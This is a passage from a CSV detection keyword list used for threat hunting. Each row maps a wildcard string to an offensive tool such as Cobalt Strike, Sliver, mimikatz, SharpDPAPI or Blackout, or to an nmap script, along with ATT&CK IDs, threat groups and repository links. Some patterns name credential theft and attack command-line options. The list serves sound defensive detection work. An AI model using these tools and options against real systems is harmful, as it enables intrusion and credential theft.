APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"* beacon_win_default*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* --beacon=*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"* beacon64.bin *","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"* Benjamin DELPY *","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"* bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"* -bindPipe * -destHost * -destPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"* bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bitcoin-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bitcoinrpc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bittorrent-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"* Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"* Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"* bleeding-jumbo john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"* blob /target:*.bin* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* blob /target:*.bin* /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* --blockDLLs --ruy-lopez*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" +"* --bloodhound --ns ip --collection All*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* bof_allocator *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* bof_reuse_memory *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* -BOFBytes *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"* BOFNET *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"* BofRunner(*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"* -bootkey *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* Brc4LdapSentinelParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"* broadcast-ataoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-avahi-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-db2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dhcp6-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dropbox-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-eigrp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-hid-discoveryd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-igmp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-jenkins-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ms-sql-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-netbios-master-browser.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-networker-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-novell-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ospf2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pc-anywhere.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pc-duo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pim-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pppoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-rip-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ripng-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 